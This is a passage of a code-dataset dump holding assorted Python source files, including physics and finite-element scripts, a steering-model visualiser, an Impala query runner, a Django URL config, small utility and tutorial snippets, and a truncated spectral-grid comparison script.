o*(1-o)*(t-o)\nx_input=[]\ny_target=[]\nlearning_rate=0.2\nrandom.seed(1)\nx_input=random.random((4,3))\nfor i in range(x_input.shape[0]):\n y_target.append(sum(x_input[i])/3)\ny_target=array(y_target)\nw_ij=2*random.random((2,3))-1\nw_jo1=2*random.random()-1\nw_jo2=2*random.random()-1\nb=2*random.random((3,1))-1\ndef FP(x,w1,w2,w3,b):\n lj1=dot(x,w1[0])+b[0]\n sigmord_lj1=sigmord(lj1)\n lj2=dot(x,w1[1])+b[1]\n sigmord_lj2=sigmord(lj2)\n lj3=(sigmord_lj1 *w2) + (sigmord_lj2 *w3) + b[2]\n output=sigmord(lj3)\n return output,sigmord_lj1,sigmord_lj2\ny_output,sigmord_lj1,sigmord_lj2=FP(x_input,w_ij,w_jo1,w_jo2,b)\n# print y_output,sigmord_lj1,sigmord_lj2\n# y_output=array(y_output)\n# y_output=y_output.T\nerror_output1=error_output(y_output,y_target)\nw_jo1+=learning_rate*error_output1*sigmord_lj1\nw_jo2+=learning_rate*error_output1*sigmord_lj2\n\n \n \n \n \n \n \n \n \n","sub_path":"mypython/DecisionTree/NW1.py","file_name":"NW1.py","file_ext":"py","file_size_in_byte":1090,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"52383989","text":"#!/usr/bin/env python3\n\n# This script walks through the revision history of the\n# legislators-social-media.yaml file to construct a historical view of social\n# media accounts for legislators.\n\nimport git\nimport rtyaml\nimport datetime\n\n\ndef main():\n repo = git.Repo('..')\n\n print('loading all legislators')\n legis = rtyaml.load(open('../legislators-historical.yaml'))\n legis.extend(rtyaml.load(open('../legislators-current.yaml')))\n\n # examine each commit to the social yaml file and merge into results\n for commit in repo.iter_commits(paths=['legislators-social-media.yaml']):\n created = datetime.datetime.fromtimestamp(commit.committed_date)\n print('examining', created)\n for blob in commit.tree.blobs:\n if blob.path == 'legislators-social-media.yaml':\n try:\n social = rtyaml.load(blob.data_stream)\n merge(social, legis, created)\n except rtyaml.yaml.error.YAMLError as e:\n print(\"yaml in commit didn't parse: {}\".format(commit))\n\n output_file = 'social.yaml'\n print('writing {}'.format(output_file))\n open(output_file, 'w').write(rtyaml.dump(legis))\n\n\ndef merge(social, legis, committed):\n \"merge the social information into the legisltors, recording the date if needed\"\n if type(social) != list:\n return\n\n date = committed.strftime('%Y-%m-%d')\n for s in social:\n\n # get the legislator\n l = find(s['id']['bioguide'], legis)\n\n # set the social property if needed\n if not 'social' in l:\n l['social'] = {}\n\n # add any new social info\n for platform, profile_id in s['social'].items():\n if platform not in l['social']:\n l['social'][platform] = {}\n if profile_id not in l['social'][platform]:\n l['social'][platform][profile_id] = date\n if date < l['social'][platform][profile_id]:\n l['social'][platform][profile_id] = date\n\n\ndef find(id, legis):\n \"Find the legislator with bioguide id\"\n matches = list(filter(lambda l: l['id']['bioguide'] == id, legis))\n assert len(matches) == 1\n return matches[0]\n\n\nif __name__ == \"__main__\":\n main()\n\n","sub_path":"scripts/social_media_history.py","file_name":"social_media_history.py","file_ext":"py","file_size_in_byte":2243,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"607647488","text":"import math\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport numpy\nfrom dolfin import *\nfrom mshr import *\nfrom datetime import datetime\n\nclass boundary_vertical(SubDomain):\n\tdef __init__(self, posicao):\n\t\tself.posicao = posicao\n\t\tSubDomain.__init__(self) # Call base class constructor!\n\tdef inside(self, x, on_boundary):\n\t\treturn on_boundary and abs(x[0] - self.posicao) < DOLFIN_EPS\n\nclass ball(SubDomain):\n def __init__(self, triangulo):\n self.xc = triangulo.centro[0]\n self.yc = triangulo.centro[1]\n self.R = triangulo.raio\n SubDomain.__init__(self) # Call base class constructor!\n def inside(self, x, on_boundary ):\n r = sqrt( ( x[0] - self.xc )**2 + ( x[1] - self.yc )**2 )\n return( on_boundary and ( r Elapsed time: ', str(elapsed_time), '\\n')\n\n\treturn Tfin, Tholes, area\n\ndef ComputeTfin(order, mesh, Lx, cond, f, Tleft, Tright, Thole, balls):\n \t\n\t# Auxilary function\n\tF0 = Constant(0)\n\n\tnballs = len(balls)\n\n\t# Construindo os subdomains das condicoes de contorno\n\tleft = boundary_vertical(0)\n\tright = boundary_vertical(Lx)\n\n\tstartTime = datetime.now()\n\n\tPk = FiniteElement(\"Lagrange\", 'triangle', order)\n\tW = FunctionSpace(mesh, Pk)\n\n\tdomains = MeshFunction(\"size_t\", mesh, 2, mesh.domains())\n\tdx = Measure(\"dx\")(subdomain_data=domains)\n\n\t# Variational problem\n\tu = TrialFunction(W)\n\tv = TestFunction(W)\n\ta = inner(cond*grad(u), grad(v))*dx\n\tL = f*v*dx\n\n\tfaux = Function(W)\n\tfaux = interpolate(Constant(1.0),W)\n\tarea = assemble(faux*dx)\n\n\t# Dirichlet boundary conditions\n\tbcleft = DirichletBC(W, Tleft, left)\n\tbcright = DirichletBC(W, Tright, right)\n\tbcs = [bcleft, bcright]\n\tfor ib in range(nballs):\n\t\tbcs.append(DirichletBC(W, Constant(Thole[ib]), balls[ib]))\n\n\tTh = Function(W)\n\tprint(\" |--Global size system = \", len(Th.vector()), \"\\n\")\n\n\tproblem = LinearVariationalProblem(a, L, Th, bcs)\n\tsolver = LinearVariationalSolver(problem)\n\tprm = solver.parameters\n\tprm[\"linear_solver\"]= \"gmres\"\n\tprm[\"preconditioner\"]= \"hypre_euclid\"\n\tprm[\"krylov_solver\"][\"absolute_tolerance\"]= 1e-12\n\tprm[\"krylov_solver\"][\"relative_tolerance\"]= 1e-10\n\tprm[\"krylov_solver\"][\"maximum_iterations\"]= 100\n\tprm[\"krylov_solver\"][\"monitor_convergence\"]= False\n\tprm[\"krylov_solver\"][\"nonzero_initial_guess\"]= True\n\tsolver.solve()\n\t\n\n\telapsed_time = datetime.now() - startTime\n\tprint('\\n ::> Elapsed time: ', str(elapsed_time), '\\n')\n\n\treturn Th, W, dx\n\ndef ConstruirDomain(nsd, Lx, Ly, tipo_hole, nballs, centers, radii, angulo, p1):\n\t# Criando o dominio\n\tholes = []\n\tif(nsd == 2):\n\t\tdomain = Rectangle(Point(0.0,0.0), Point(Lx,Ly))\n\t\tfor ib in range(nballs):\n\t\t\t\n\t\t\tif( tipo_hole=='triangulo' ):\n\t\t\t\tholes.append( Triangulo( centers[ib], radii[ib], angulo[ib], p1[ib], False) )\n\t\t\telif( tipo_hole=='circulo' ):\n\t\t\t\tholes.append( Circulo(centers[ib], radii[ib]) )\n\t\t\telse:\n\t\t\t\tprint('Tipo de hole nao definido...')\n\t\t\t\texit()\n\t\t\t\n\t\t\tdomain = domain - holes[ib]\n\telse:\n\t\tsys.exit(\"nsd.eq.3 not implemented\")\n\n\treturn domain, holes\n\ndef ConstruirMalha(mesh, domain, nr, order, tipo_hole, balls, centers, radii):\n\n\tnballs = len(balls)\n\n\tif(nr == 0):\n\t\tmesh.append(generate_mesh( domain, 15*(1.5*nr+1) ))\n\t\tplot(mesh[0])\n\t\tplt.show()\n\telse:\n\t\tmesh.append(refine(mesh[nr-1], redistribute=False))\n\n\n\tif(order == 2):\n\t\tmesh[nr] = p_refine(mesh[nr])\n\t\tmesh[nr].init()\n\n\t# Project points to circles\n\tif( tipo_hole=='circulo' ):\n\t\tmovebpoints = 1\n\t\tif(movebpoints):\n\t\t\tfor x in mesh[nr].coordinates():\n\t\t\t\tfor ib in range(nballs):\n\t\t\t\t\tif balls[ib].inside(x, True):\n\t\t\t\t\t\trr = math.sqrt((x[0] - centers[ib][0])**2 + (x[1] - centers[ib][1])**2)\n\t\t\t\t\t\tx[0] = centers[ib][0] + radii[ib]*(x[0]-centers[ib][0])/rr\n\t\t\t\t\t\tx[1] = centers[ib][1] + radii[ib]*(x[1]-centers[ib][1])/rr\n\n\tprint(\" |-Mesh done - Step: %d\" %(nr))\n\tprint(\" |--Number of vertices = \"+str(mesh[nr].num_vertices()))\n\tprint(\" |--Number of cells = \"+str(mesh[nr].num_cells()))\n\tprint(\" |--Cell size hmax,hmin = %.3g %.3g\" % (mesh[nr].hmax(), mesh[nr].hmin()))\n\ndef distancia(A, B):\n\treturn np.sqrt( (B[0] - A[0])**2 + (B[1] - A[1])**2 )\n\ndef Rotacao(v, angulo):\n\tv2x = math.cos(angulo)*v[0] - math.sin(angulo)*v[1]\n\tv2y = math.sin(angulo)*v[0] + math.cos(angulo)*v[1]\n\treturn np.array([v2x, v2y])\n\n\nclass Triangulo(Polygon):\n\tdef __init__(self, c_in, raio, angulo, arco_p1, plotar_circulo=False):\n\n\t\tangulo = np.pi*angulo/180.0\n\t\tarco_p1 = np.pi*arco_p1/180.0\n\n\t\t# Transformando em numpy array, caso venha como lista\n\t\tC = np.array(c_in)\n\t\teixo_x = np.array( [1, 0] )\n\n\t\t# p1 e p2 estao, por definicao, na mesma altura (coord. y) que o centro do circumcirculo\n\t\tp1 = np.array( [np.cos(arco_p1), np.sin(arco_p1)] )\n\t\tp1 = C + raio*p1\n\n\n\t\t# Funcao do circumcirculo\n\t\tf2 = lambda alfa:( funcao_pontocirc(C, raio, p1, 0.5*angulo, alfa) )\n\t\tf3 = lambda alfa:( funcao_pontocirc(C, raio, p1, -0.5*angulo, alfa) )\n\n\t\talfa = bissecao(f2, 0.01, 1000.0)\n\t\tp2 = p1 + alfa*Rotacao(C - p1, 0.5*angulo)\n\n\t\talfa = bissecao(f3, 0.01, 1000.0)\n\t\tp3 = p1 + alfa*Rotacao(C - p1, -0.5*angulo)\n\n\t\tsuper().__init__([Point(p3), Point(p2), Point(p1)])\n\t\t\n\n\t\t# Plotando\n\t\tif plotar_circulo:\n\t\t\tcircle = plt.Circle((C[0], C[1]), raio, fill=False, color='#FF0000')\n\t\t\tplt.gca().add_artist(circle)\n\n\t\tself.raio = raio\n\t\tself.centro = C.tolist()\n\nclass Circulo(Circle):\n\tdef __init__(self, centro, raio):\n\t\tself.raio = raio\n\t\tself.centro = centro\n\n\t\tsuper().__init__(Point(centro[0], centro[1]), raio)\n\n\ndef bissecao(funcao, a, b):\n\n\tparar = 1e-10\n\twhile( abs(a-b)>parar ):\n\t\tfa = funcao(a)\n\t\tfb = funcao(b)\n\n\t\tif( fa*fb > 0 ):\n\t\t\treturn float('nan')\n\t\telif( fa==0 ):\n\t\t\treturn a\n\t\telif( fb==0 ):\n\t\t\treturn b\n\t\telse:\n\t\t\tmeio = 0.5*(a+b)\n\t\t\tif( funcao(meio)*fa < 0 ):\n\t\t\t\tb = meio\n\t\t\telse:\n\t\t\t\ta = meio\n\n\treturn 0.5*(a + b)\n\n\ndef funcao_pontocirc(C, raio, p, angulo, alfa):\n\n\tv = C - p\n\tv = Rotacao(v, angulo)\n\n\tp2 = p + alfa*v\n\tdif = C - p2\n\n\treturn np.dot(dif, dif) - raio*raio\n","sub_path":"exercicios-computacionais/trabalho-holes/modulo_Tholes.py","file_name":"modulo_Tholes.py","file_ext":"py","file_size_in_byte":8986,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"397457513","text":"import tensorflow as tf\nimport scipy.misc\nimport model\nimport cv2\nfrom subprocess import call\nimport numpy as np\nsess = tf.InteractiveSession()\nsaver = tf.train.Saver()\nsaver.restore(\n # sess, \"/home/liqifan/py_code/SelfCar-Tensorflow/save/model(10, 17, 7, 7).ckpt\")\n sess, \"/home/liqifan/py_code/SelfCar-Tensorflow/save/model(10, 17, 7, 7).ckpt\")\n\nimg = cv2.imread('/home/liqifan/py_code/SelfCar-Tensorflow/wheel.jpg', 0)\nimg2 = cv2.imread('/home/liqifan/py_code/SelfCar-Tensorflow/wheel.jpg', 0)\nrows, cols = img.shape\nf = open('/home/liqifan/driving_dataset/data.txt', 'r')\ndegress_h = np.array(f.read().split()).reshape((-1, 2))\nf.close()\nsmoothed_angle = 0\nsmoothed_angle_h = 0\n\ni = 0\nwhile(cv2.waitKey(10) != ord('q')):\n full_image = scipy.misc.imread(\n \"driving_dataset/\" + str(i) + \".jpg\", mode=\"RGB\")\n image = scipy.misc.imresize(full_image[-150:], [66, 200]) / 255.0\n\n degrees = model.y.eval(feed_dict={model.x: [image], model.keep_prob: 1.0})[\n 0][0] * 180.0 / scipy.pi\n human_degrees = float(degress_h[i, 1])\n\n call(\"clear\")\n print(\"Predicted steering angle: \" + str(degrees) + \" degrees\")\n cv2.imshow(\"frame\", cv2.cvtColor(full_image, cv2.COLOR_RGB2BGR))\n\n smoothed_angle += 0.2 * pow(abs((degrees - smoothed_angle)), 2.0 / 3.0) * (\n degrees - smoothed_angle) / abs(degrees - smoothed_angle)\n smoothed_angle_h += 0.2 * pow(abs((human_degrees - smoothed_angle_h)), 2.0 / 3.0) * (\n human_degrees - smoothed_angle_h) / abs(degrees - smoothed_angle)\n\n M = cv2.getRotationMatrix2D((cols / 2, rows / 2), -smoothed_angle, 1)\n M2 = cv2.getRotationMatrix2D((cols / 2, rows / 2), -smoothed_angle_h, 1)\n\n dst = cv2.warpAffine(img, M, (cols, rows))\n dst2 = cv2.warpAffine(img2, M, (cols, rows))\n\n cv2.imshow(\"智障型老司机AI\", dst)\n # cv2.imshow(\"human\", dst2)\n i += 1\n\ncv2.destroyAllWindows()\n","sub_path":"run_dataset.py","file_name":"run_dataset.py","file_ext":"py","file_size_in_byte":1882,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"529162207","text":"import numpy as np\n\nclass FourVector:\n \n g=np.array([[1,0,0,0], #metric tensor\n [0,-1,0,0],\n [0,0,-1,0],\n [0,0,0,-1]])\n \n \n m=complex(0.1,0) #trying out invariant mass, will set this as an incident variable later\n \n def __init__(self,t=0,R=None,V=None): \n \n self.x=np.array([t,R[0],R[1],R[2]]) #space-time 4 vector\n \n if R and V is not None:\n \n self.R=np.array([R[0],R[1],R[2]]) #spatial part of the vector\n \n self.V=np.array([V[0],V[1],V[2]]) #velocity is given in c's, natural units\n \n self.p=np.array(FourVector.m*self.V) #3-momentum \n \n self.gam=1/np.sqrt(1-np.linalg.norm(V)**2) #gamma factor of the vector\n \n self.normR=np.array([0,2]) if np.linalg.norm(R)==0 else R/np.linalg.norm(R) #calculates the norm of 3-position\n \n self.normV=np.array([0,2]) if np.linalg.norm(V)==0 else V/np.linalg.norm(V) #calculates the norm of 3-velocity\n \n def SwitchToCoM(self,other): #this is currently for only two particles, will update later.\n for i in range(0,2):\n CoMR=np.array([(self.R[i-1]+other.R[i-1])/2,(self.R[i]+other.R[i])/2,(self.R[i+1]+other.R[i+1])/2]) \n return CoMR\n \n def LorentzTransform(self): \n #general Lorentz transform matrix for velocity\n self.TransfromMatrix=np.array([[self.gam,-self.gam*self.V[0],-self.gam*self.V[1],-self.gam*self.V[2]],\n [-self.gam*self.V[0],1+(self.gam-1)*self.normV[0]**2,(self.gam-1)*self.normV[0]*self.normV[1],(self.gam-1)*self.normV[0]*self.normV[2]],\n [-self.gam*self.V[1],(self.gam-1)*self.normV[0]*self.normV[1],1+(self.gam-1)*self.normV[1]**2,(self.gam-1)*self.normV[1]*self.normV[2]],\n [-self.gam*self.V[2],(self.gam-1)*self.normV[2]*self.normV[0],(self.gam-1)*self.normV[2]*self.normV[1],1+(self.gam-1)*self.normV[2]**2]])\n \n return np.dot(self.TransformMatrix,self.x)\n \n def FourDotProduct(self,other): #as the name says...\n return self.x@FourVector.g@other.x\n #return self.x[0]*other.x[0]-self.x[1]*other.x[1]-self.x[2]*other.x[2]-self.x[3]*other.x[3] \n #return np.trace(self.x*FourVector.g*other.x), this one also seems to be accurate but not as straightforward as the one above.\n \n def FourVelocity(self): #get 4-velocity from self.x type of input\n return np.array([self.gam*FourVector.c,self.gam*self.V[0],self.gam*self.V[1],self.gam*self.V[2]])\n \n def FourMomentum(self): #get4-momentum from 4-velocity\n return FourVector.m*FourVector.FourVelocity(self)\n \n def Addition(self,other): #vector addition\n return np.array([self.x[0]+other.x[0],self.x[1]+other.x[1],self.x[2]+other.x[2],self.x[3]+other.x[3]]) \n\n def Subtraction(self,other): #vector subtraction because why not\n return np.array([self.x[0]-other.x[0],self.x[1]-other.x[1],self.x[2]-other.x[2],self.x[3]-other.x[3]]) \n \n def Energy(self): #energy from E**2 = p**2 + m**2, would need to tweak this later. \n E=((FourVector.m)**2+np.dot(self.p,self.p))**0.5\n return E \n \n \n\n#---------------------------DEFINING GAMMA MATRICES---------------------------------------------------------------- \n#Pauli Matrices\nPauli1=np.array([[0,1],[1,0]])\nPauli2=np.array([[0,-complex(0,1)],[complex(0,1),0]])\nPauli3=np.array([[1,0],[0,-1]])\n\n#Gamma Matrices constructed from Pauli Matrices using np.block()\nGamma0=np.block([[np.identity(2),np.zeros((2,2))],[np.zeros((2,2)),-np.identity(2)]])\nGamma1=np.block([[np.zeros((2,2)),Pauli1],[-Pauli1,np.zeros((2,2))]])\nGamma2=np.block([[np.zeros((2,2)),Pauli2],[-Pauli2,np.zeros((2,2))]])\nGamma3=np.block([[np.zeros((2,2)),Pauli3],[-Pauli3,np.zeros((2,2))]])\nGamma5=complex(0,1)*(Gamma0@Gamma1@Gamma2@Gamma3)\nN=FourVector(0,[2,5,1],[0.01,0.02,0.03])\n\n#--------------------------ASSIGNING REPRESENTATIONS TO SPINORS----------------------------------------------------\n\n#Defining Pauli Spinors\nA=np.array([0,1])\nB=np.array([1,0])\n\nX1=A.reshape(-1,1) #gives chi1, (0,1)\nX2=B.reshape(-1,1) #gives chi2, (1,0)\n\n\n#Introducing Dirac Spinors-for a specific vector N for now\nC1=np.array([N.p[2]/(FourVector.Energy(N)+FourVector.m),complex(N.p[0],N.p[1])/(FourVector.Energy(N)+FourVector.m)])\nD1=C1.reshape(-1,1)\n\nC2=np.array([complex(N.p[0],-N.p[1])/(FourVector.Energy(N)+FourVector.m),-N.p[2]/(FourVector.Energy(N)+FourVector.m)])\nD2=C2.reshape(-1,1)\n\neta=(FourVector.Energy(N)+FourVector.m)**0.5\n\nu1=eta*np.concatenate([X2,D1]) #u and v dirac spinors for a given mass, momentum and energy \nu2=eta*np.concatenate([X1,D2])\nv1=eta*np.concatenate([D1,X2])\nv2=eta*np.concatenate([D2,X1])\n\n#-------------------------------ATTEMPTING THE S FUNCTION----------------------------------------------------------\n#Would it be accurate to use np.dot() to multiply a k vector and a p vector?\n\n\n\n\n\n\n\n\n\n\n\n","sub_path":"4-Vector.py","file_name":"4-Vector.py","file_ext":"py","file_size_in_byte":5029,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"188212043","text":"import time\nimport logging\nfrom contextlib import closing\nfrom dae.query_variants.query_runners import QueryRunner\n\nlogger = logging.getLogger(__name__)\n\n\nclass ImpalaQueryRunner(QueryRunner):\n \"\"\"Run a Impala query in a separate thread.\"\"\"\n\n def __init__(self, connection_factory, query, deserializer=None):\n super().__init__(deserializer=deserializer)\n\n self.connection_pool = connection_factory\n self.query = query\n\n def connect(self):\n \"\"\"Connect to the connection pool and return the connection.\"\"\"\n started = time.time()\n while True:\n try:\n connection = self.connection_pool.connect()\n return connection\n except TimeoutError:\n elapsed = time.time() - started\n logger.debug(\n \"runner (%s) timeout in connect; elapsed %0.2fsec\",\n self.study_id, elapsed)\n if self.is_closed():\n logger.info(\n \"runner (%s) closed before connection established \"\n \"after %0.2fsec\",\n self.study_id, elapsed)\n return None\n\n def run(self):\n \"\"\"Execute the query and enqueue the resulting rows.\"\"\"\n started = time.time()\n if self.is_closed():\n logger.info(\n \"impala runner (%s) closed before executing...\",\n self.study_id)\n return\n\n logger.debug(\n \"impala runner (%s) started; \"\n \"connectio pool: %s\",\n self.study_id, self.connection_pool.status())\n\n connection = self.connect()\n\n if connection is None:\n self._finalize(started)\n return\n\n with closing(connection) as connection:\n elapsed = time.time() - started\n logger.debug(\n \"runner (%s) waited %0.2fsec for connection\",\n self.study_id, elapsed)\n with connection.cursor() as cursor:\n try:\n if self.is_closed():\n logger.info(\n \"runner (%s) closed before execution \"\n \"after %0.2fsec\",\n self.study_id, elapsed)\n self._finalize(started)\n return\n\n cursor.execute_async(self.query)\n self._wait_cursor_executing(cursor)\n\n while not self.is_closed():\n row = cursor.fetchone()\n if row is None:\n break\n val = self.deserializer(row)\n\n if val is None:\n continue\n\n self._put_value_in_result_queue(val)\n\n if self.is_closed():\n logger.debug(\n \"query runner (%s) closed while iterating\",\n self.study_id)\n break\n\n except Exception as ex: # pylint: disable=broad-except\n logger.error(\n \"exception in runner (%s) run: %s\",\n self.study_id, type(ex), exc_info=True)\n self._put_value_in_result_queue(ex)\n logger.debug(\n \"runner (%s) closing connection\", self.study_id)\n self.close()\n\n self._finalize(started)\n\n def _wait_cursor_executing(self, cursor):\n while True:\n if self.is_closed():\n logger.debug(\n \"query runner (%s) closed while executing\",\n self.study_id)\n break\n if not cursor.is_executing():\n logger.debug(\n \"query runner (%s) execution finished\",\n self.study_id)\n break\n time.sleep(0.1)\n\n def _finalize(self, started):\n with self._status_lock:\n self._done = True\n elapsed = time.time() - started\n logger.debug(\"runner (%s) done in %0.3f sec\", self.study_id, elapsed)\n logger.debug(\"connection pool: %s\", self.connection_pool.status())\n","sub_path":"impala_storage/impala_storage/helpers/impala_query_runner.py","file_name":"impala_query_runner.py","file_ext":"py","file_size_in_byte":4275,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"168262210","text":"\"\"\"\nCopyright (c) 2020, 2022, Oracle Corporation and/or its affiliates.\nLicensed under the Universal Permissive License v 1.0 as shown at https://oss.oracle.com/licenses/upl.\n\"\"\"\nimport java.util.logging.Level as Level\n\nfrom wlsdeploy.logging.platform_logger import PlatformLogger\nfrom wlsdeploy.util.enum import Enum\n\nSTANDALONE = 'STANDALONE'\nTOOL = 'TOOL'\n\n\nclass ValidatorLogger(PlatformLogger):\n\n def __init__(self, logger_name, mode_type=TOOL,\n resource_bundle_name='oracle.weblogic.deploy.messages.wlsdeploy_rb'):\n PlatformLogger.__init__(self, logger_name, resource_bundle_name)\n self._mode_type = mode_type\n # The logger properties is set to level FINE, which is for tool mode. Reset that to FINER for\n # standalone mode. This will of course not help the standalone user that wants FINE level\n # but the logs are for WDT troubleshooting.\n if self.get_level() == Level.FINE and self._mode_type == STANDALONE:\n self.set_level(Level.FINER)\n\n def info(self, message, *args, **kwargs):\n \"\"\"\n Log an info-level message.\n :param message: the message key\n :param args: the arguments to use to populate the message placeholders\n :param kwargs: the keyword arguments\n \"\"\"\n method = kwargs.pop('method_name', None)\n clazz = kwargs.pop('class_name', None)\n error = kwargs.pop('error', None)\n level = Level.INFO\n if self._mode_type == TOOL:\n level = Level.FINE\n record = self._get_log_record(level, clazz, method, message, error, *args)\n self.logger.log(record)\n","sub_path":"core/src/main/python/wlsdeploy/tool/validate/validator_logger.py","file_name":"validator_logger.py","file_ext":"py","file_size_in_byte":1635,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"366381174","text":"# lists = used to store multiple items in a single variable\n\nfood = [\"pizza\", \"hamburgers\", \"hotdog\", \"spaghetti\", \"pudding\"]\n\n#food[0] = \"Sushi\"\n#food.append(\"ice cream\")\n#food.remove(\"hotdog\")\n#food.pop()\n#food.insert(0, \"cake\")\n#food.insert(19, \"hello\")\n#food.sort()\n#food.clear()\n\n#print(food[0])\n\nfor x in food:\n print(x)\n\n\n","sub_path":"lists.py","file_name":"lists.py","file_ext":"py","file_size_in_byte":332,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"483581972","text":"#+\n# This module defines routine to ease getting/setting lots of attributes\n# on an object at once. Routines provided are:\n#\n# * getattrs -- bulk retrieving of attribute values\n# * setattrs -- bulk setting of attribute values (can be used with result returned from getattrs)\n# * pushattrs -- bulk setting of attribute values and saving of previous values\n# * popattrs -- restores attribute values changed by pushattrs (just another name for setattrs)\n# * delattrs -- bulk deletion of attributes\n#\n# See the docstrings for more details.\n#\n# Copyright 2013, 2014 by Lawrence D'Oliveiro .\n# Licensed under CC-BY-SA .\n#-\n\ndef getattrs(obj, attrnames) :\n \"returns a dictionary of the current values of the specified attributes of\\n\" \\\n \"the specified object. attrnames must be a list or tuple of attribute name strings.\"\n result = {}\n for attr in attrnames :\n result[attr] = getattr(obj, attr)\n #end for\n return \\\n result\n#end getattrs\n\ndef _setattrs_common(obj, setattr, args, kwargs) :\n # common code for both setattrs and pushattrs\n if (len(args) != 0) == (len(kwargs) != 0) :\n raise TypeError(\"specify attrs via either sequence/dict or keyword args, not both\")\n #end if\n if len(args) != 0 :\n if len(args) != 1 :\n raise TypeError(\"only one additional non-keyword arg allowed\")\n #end if\n attrset = args[0]\n if type(attrset) in (list, tuple) :\n for arg in attrset :\n key, val = arg\n setattr(obj, key, val)\n #end for\n elif type(attrset) == dict :\n for key in attrset :\n setattr(obj, key, attrset[key])\n #end for\n else :\n raise TypeError(\"type of arg must be list, tuple or dict\")\n #end if\n elif len(kwargs) != 0 :\n for attr in kwargs :\n setattr(obj, attr, kwargs[attr])\n #end for\n #end if\n#end _setattrs_common\n\ndef setattrs(obj, *args, **kwargs) :\n \"does bulk setting of attributes on obj. Call this in any of the following ways:\\n\" \\\n \"\\n\" \\\n \" setattrs(obj, ((key, val), (key, val) ...))\\n\" \\\n \" setattrs(obj, {key : val, key : val ...})\\n\" \\\n \" setattrs(obj, key = val, key = val ...)\\n\" \\\n \"\\n\" \\\n \"in each case, “key” is the name of an attribute of the object, and “val” is the\\n\" \\\n \"new value to assign to it. In the first two cases, the key must be a string; in the\\n\" \\\n \"last case, it is an unquoted word as per usual Python keyword-argument syntax.\\n\"\n _setattrs_common(obj, setattr, args, kwargs)\n#end setattrs\n\ndef pushattrs(obj, *args, **kwargs) :\n \"similar to settatrs, but returns a dict mapping attribute names to previous values\" \\\n \" for all attributes which were set. This can be passed to popattrs/setattrs to\" \\\n \" restore the previous values.\"\n prevattrs = {}\n def pushattr(obj, key, val) :\n prevattrs[key] = getattr(obj, key)\n setattr(obj, key, val)\n #end pushattr\n#begin pushattrs\n _setattrs_common(obj, pushattr, args, kwargs)\n return \\\n prevattrs\n#end pushattrs\n\npopattrs = setattrs\n # alternative name for symmetry with pushattrs\n\ndef delattrs(obj, attrnames, ignore_error = False) :\n \"deletes the specified attributes from the specified object. attrnames must be\\n\" \\\n \"a tuple or list of string attribute names. ignore_error can be set to True\\n\" \\\n \"to quietly ignore deletion failures.\"\n for attr in attrnames :\n try :\n delattr(obj, attr)\n except AttributeError as fail :\n if not ignore_error :\n raise\n #end if\n #end try\n #end for\n#end delattrs\n","sub_path":"attrs_useful.py","file_name":"attrs_useful.py","file_ext":"py","file_size_in_byte":3765,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"457286817","text":"'''\nUsing a map to store the count of characters from the first String and subtracting the count from the map while iterating the second string.\n\nGiven the strings are of same length.\n'''\n\ndef isPermutation1(s,t):\n if len(s) != len(t):\n return False\n map = {}\n for i in s:\n if i in map:\n map[i] = map[i] + 1\n else:\n map[i] = 1\n\n for i in t:\n if i not in map:\n return False\n map[i] = map[i] - 1\n\n for x in map.values():\n if x != 0:\n return False\n\n return True\n","sub_path":"Chapter_1/1.2.1_is_permutation.py","file_name":"1.2.1_is_permutation.py","file_ext":"py","file_size_in_byte":563,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"352554792","text":"from django.urls import path\n\nfrom producto.views import ProducListView\nfrom .import views\n\nurlpatterns = [\n path('producto/', ProducListView.as_view(), name='index'),\n path('producto/borrar/', views.borrar_producto, name='borrar_producto'),\n path('producto/formulario/', views.nuevo_producto, name='nuevo_producto'),\n path('producto/editar/', views.editar_producto, name='editar_producto'),\n path('get_all_products', views.GetAllProduct.as_view()),\n #path('', views.marca, name='marca'),\n\n]","sub_path":"producto/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":517,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"619472269","text":"#!/usr/bin/env python\n\nimport matplotlib.pyplot as plt\nimport numpy as np\n\nfrom StellarSpectra.grid_tools import HDF5Interface\nfrom StellarSpectra.model import Model, ModelHA\n\n\n'''\nDesigned to interrogate how instrumental convolution and downsampling the grid may affect the accuracy of the final\ngenerated spectra. Basically, we want to find the minimal resolution such that we are still under some stated\naccuracy in parameters (for example 10 K, 0.05 dex in logg and Z).\n\n'''\n\ndef get_resid_spec(base, offset):\n '''\n Given a base spectrum and a spectrum slightly offset, return the residual spectrum between the two\n '''\n #Normalize both spectra\n base /= np.mean(base)\n offset /= np.mean(offset)\n\n #return the absolute \"error\"\n return np.abs((base - offset)/base)\n\ndef get_min_spec(spec_list):\n '''\n Given a list of residual spectra, created with `create_resid_spec', determine for each pixel the minimum offset so\n that we can use this as an error envelope in the approximate spectra.\n '''\n\n #For each pixel, take the smallest value\n #Vstack the arrays and take the min along axis=1\n arr = np.vstack(spec_list)\n return np.min(arr, axis=0)\n\nclass AccuracyComparison:\n '''\n Gather the data products necessary to make a test about accuracy of the reduced grid sizes.\n\n '''\n\n def __init__(self, DataSpectrum, Instrument, LibraryHA, LibraryLA, parameters, deltaParameters):\n '''Initialize the comparison object.\n\n :param DataSpectrum: the spectrum that provides a wl grid + natural resolution\n :type DataSpectrum: :obj:`grid_tools.DataSpectrum`\n :param Instrument: the instrument object on which the DataSpectrum was acquired (ie, TRES, SPEX...)\n :type Instrument: :obj:`grid_tools.Instrument`\n :param LibraryHA: the path to the native resolution spectral library\n :type LibraryHA: string\n :param LibraryLA: the path to the 